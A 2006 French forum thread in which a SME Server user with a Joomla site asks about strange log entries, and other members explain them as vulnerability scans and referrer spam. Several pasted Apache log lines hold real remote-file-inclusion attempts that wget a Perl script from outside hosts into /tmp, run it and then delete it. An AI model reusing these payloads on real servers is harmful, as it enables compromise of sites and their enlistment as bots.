Faille sur SME 7 RC3 ?

Forum dédié à la distribution du même nom et que vous pourrez télécharger sur http://www.contribs.org. La nouvelle version de cette distribution se nomme SME Server

Modérateur: modos Ixus

Faille sur SME 7 RC3 ?

Messagepar ericcfs2 » 21 Juin 2006 19:19

Bonsoir a tous
je viens d'installer une SME 7 RC3
toute fraiche
un site tourne dessus avec JOOMLA 1.0.9
or depuis 2 3 jours j'ai des logs un peu bizzare
dans awstats
capture d'ecran
Image

le site est un site de Littérature
or des logs du japon et d'un peu partout
quand on les trace avec visual route
bizzare non

qu'en pensez vous ?
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar androme » 21 Juin 2006 21:34

En quoi ces logs te permettent de dire qu'il y a une faille ?
IPCOP 1.4.11 + guardian + urlfilter + advproxy | red + orange + green
PIII 550 | 384 Mo | 4,3 Go 2.5"

Serveur Debian Sarge XEN
XP 1800+ | 512Mo | 2*40 Go
2 serveurs virtuels
Avatar de l’utilisateur
androme
Lieutenant de vaisseau
Lieutenant de vaisseau
 
Messages: 194
Inscrit le: 27 Fév 2006 18:20
Localisation: Arles city

Messagepar ericcfs2 » 21 Juin 2006 22:24

en fait le site est sur la litterature francophone
donc un public tres ciblé

j'utilisais un composant akocomment
qui permet de poser des commentaires sans enregistrer

et un robot avait mis des commentaires sur le site
avec des liens cliquables
j'ai desactivé les fonctions mails du serveur et les logs d'un peu partout
se sont arreté
remis les fonctions pop etc
puis des acces d'un peu partout sont ré apparus

je pense que le serveur sert de relais spam ou un truc comme cela
j'ai tracé avec visual route
et la plupart sont des sites tres loins japonais tai etc...
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar fraedhrim » 21 Juin 2006 22:34

Hmm....

Il faudrait surtout voir à quoi correspondent ces connexions. Si ton site est ouvert à tout Internet vu la propreté des ordinateurs sur Internet et le nombre de tentatives plus ou moins intelligentes de scans et d'attaque à l'unité de temps avoir des logs de partout dans le monde n'a rien de surprenant. Passe en revue les URL accédées tu verras surement que c'est des tentatives d'accès à des pages qui n'existent même pas sur ton site. Genre des robots qui cherchent des forums défaillant pour implanter de la pub pour des pilules miracles qui font gonfler les extrémités sensibles.... Un exemple chez moi :
Code: Tout sélectionner
[Mon May  8 08:01:10 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/index2.php
[Mon May  8 08:01:11 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/index.php
[Mon May  8 08:01:13 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/mambo/index2.php
[Mon May  8 08:01:14 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/cvs/index2.php
[Mon May  8 08:01:17 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/xmlrpc.php
[Mon May  8 08:01:18 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/drupal/xmlrpc.php
[Mon May  8 08:01:19 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/phpgroupware/xmlrpc.php
[Mon May  8 08:01:21 2006] [error] [client 59.49.233.25] File does not exist: /home/e-smith/files/ibays/Primary/html/wordpress/xmlrpc.php
[...]
[Sun May 21 16:36:30 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/a1b2c3d4e5f6g7h8i9/nonexistentfile.php
[Sun May 21 16:36:31 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/adxmlrpc.php
[Sun May 21 16:36:31 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/adserver/adxmlrpc.php
[Sun May 21 16:36:31 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/phpAdsNew/adxmlrpc.php
[Sun May 21 16:36:32 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/phpadsnew/adxmlrpc.php
[Sun May 21 16:36:32 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/phpads/adxmlrpc.php
[Sun May 21 16:36:32 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/Ads/adxmlrpc.php
[Sun May 21 16:36:33 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/ads/adxmlrpc.php
[Sun May 21 16:36:33 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/xmlrpc.php
[Sun May 21 16:36:33 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/xmlrpc/xmlrpc.php
[Sun May 21 16:36:34 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/xmlsrv/xmlrpc.php
[Sun May 21 16:36:34 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/blog/xmlrpc.php
[Sun May 21 16:36:34 2006] [error] [client 69.13.190.28] File does not exist: /home/e-smith/files/ibays/Primary/html/drupal/xmlrpc.php


Et une tentative de recherche de faille.... Mais bon pas grave y'a rien à ces endroits....

Après il y a aussi les robots des moteur de recherche qui se baladent pas mal et qui génèrent des logs. Mais là aussi pas grâve et même normal....

Bref regarde les logs détaillés....

A+

Fred
Avatar de l’utilisateur
fraedhrim
Amiral
Amiral
 
Messages: 1264
Inscrit le: 27 Jan 2004 01:00
Localisation: Nantes

Messagepar ericcfs2 » 21 Juin 2006 22:45

je vais regarder cela
je vous dis quoi demain

:)
de toute façon
vive les sauvegardes
:D
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar Grand-Pa » 22 Juin 2006 01:05

fraedhrim a écrit:Après il y a aussi les robots des moteur de recherche qui se baladent pas mal et qui génèrent des logs. Mais là aussi pas grâve et même normal....
Tout à fait !
J'en suis moi-même envahi ces jours-ci.

En fait, leur procédé pourri est le suivant : sur leurs sites de raclures, ils mettent des liens vers des sites tiers (dont les notres) qui les voient comme sites "référents" dans les logs d'Apache.
Or si, comme moi, tu exposes des statistiques web, tu as une page qui va indiquer un lien vers leurs sites véreux. Ensuite, les robots des moteurs de recherche, quand ils vont faire le tour de ton site, vont prendre en compte tes liens vers leurs sites vomitifs et donc les faire monter en popularité.

Du coup, tu te retrouves à faire involontairement de la pub pour ces chiens galleux (et encore, j'me r'tiens, hein...) !!! :evil:

Pas content ! Pas content ! Pas content ! :lol:


Dans mon cas, la cible visée est ma page générée avec "Les Visiteurs". J'ai donc fait une tâche cron qui, toutes les minutes, va nettoyer la BdD MySQL des liens vers ces fumiers.
Et hop, finis les galons !
Avatar de l’utilisateur
Grand-Pa
Vice-Amiral
Vice-Amiral
 
Messages: 728
Inscrit le: 08 Avr 2002 00:00
Localisation: Gap, France

Messagepar ericcfs2 » 22 Juin 2006 07:56

:D
et oui
pour faire un site de qualité il faut vraiment bosser
:)
quand je vois comment c'est difficile rien que pour etre bien positionné dans google

je comprends leur interet

:)
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar ericcfs2 » 22 Juin 2006 09:10

Salut Grand-pa
Tu as certainnement raison
je suis allé voir quelques IP avec le navigateur web
et ce sont des sites qui viennent d'etre lancé
et la recherche d'indexation par les moteurs de recherche
semblent etre une bonne piste

par contre sur le site je n'ai pas donné l'accés aux stats
donc ils en sont pour leur frais

:D
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar fraedhrim » 22 Juin 2006 19:34

Rhaaaa les fourbes !
Avatar de l’utilisateur
fraedhrim
Amiral
Amiral
 
Messages: 1264
Inscrit le: 27 Jan 2004 01:00
Localisation: Nantes

suite

Messagepar ericcfs2 » 23 Juin 2006 16:06

je regardes les logs aujourd'hui et cela continue mais ce ne sont pas pages erronées qu'il recherche
exemple
Image
je resouds son adresse et je regarde dans le slogs


poesie-citation.info 204.157.36.232 - - [23/Jun/2006:15:42:16 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://4c-squad.co.yu/chat/chat/cmd.txt?&cmd=cd%20/tmp;wget%20http://4c-squad.co.yu/chat/chat/rsk;%20perl%20rsk;rm%20-rf%20rsk? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
poesie-citation.info 204.157.36.232 - - [23/Jun/2006:15:42:16 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://4c-squad.co.yu/chat/chat/cmd.txt?&cmd=cd%20/tmp;wget%20http://4c-squad.co.yu/chat/chat/rsk;%20perl%20rsk;rm%20-rf%20rsk? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar ericcfs2 » 23 Juin 2006 16:08

et la on voit qu'il passes des parametres
pour faire du tchat
ou un truc dans ce genre non ?

je vous en donne d'autres tout a l'heure
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar ericcfs2 » 23 Juin 2006 16:12

Image
Dernière édition par ericcfs2 le 23 Juin 2006 16:18, édité 2 fois au total.
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar ericcfs2 » 23 Juin 2006 16:16

voici la ligne dans les logs
poesie-citation.info 202.181.97.63 - - [23/Jun/2006:14:53:32 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hcaku.iespana.es/tool25.png?&cmd=cd%20/tmp/;wget%20http://dooku.anonimoserver.com/~web/energie.tx;perl%20energie.txt;rm%20-rf%20energie.*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Messagepar sibsib » 23 Juin 2006 21:02

Hello,

Tu as a faire à un bot qui cherche une vulnérabilité sur ta machine : il tente de télécharger un bout de script et de l'exécuter (probablement pour faire de ton SME un zombie).

Ce n''est pas grave si tu n'as pas installé sur ta machine un package public avec une faille connue :-)

Et, même si c'était le cas, ce ne serait pas une faille SME 7, mais une faille dans le super soft que tu aurais installé pour gérer ton site web.

A+,
Pascal
Sibsib, admin heureux d'un petit SME !!!
- SME 8.0 beta 6 dans une VM :-)
- ESXI 4.1 sur hardware noname
Ma petite page sur SME
Avatar de l’utilisateur
sibsib
Amiral
Amiral
 
Messages: 2368
Inscrit le: 11 Mai 2002 00:00
Localisation: France - région parisienne

Messagepar ericcfs2 » 23 Juin 2006 21:43

j'ai juste mis sme 7 admin
Php myadmin
et site en Joomla 1.0.9
derniere version
:)
de la poésie
http://www.poesie-citation.fr
Avatar de l’utilisateur
ericcfs2
Premier-Maître
Premier-Maître
 
Messages: 56
Inscrit le: 08 Nov 2003 01:00
Localisation: 91

Suivant

Retour vers E-Smith / SME Server

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité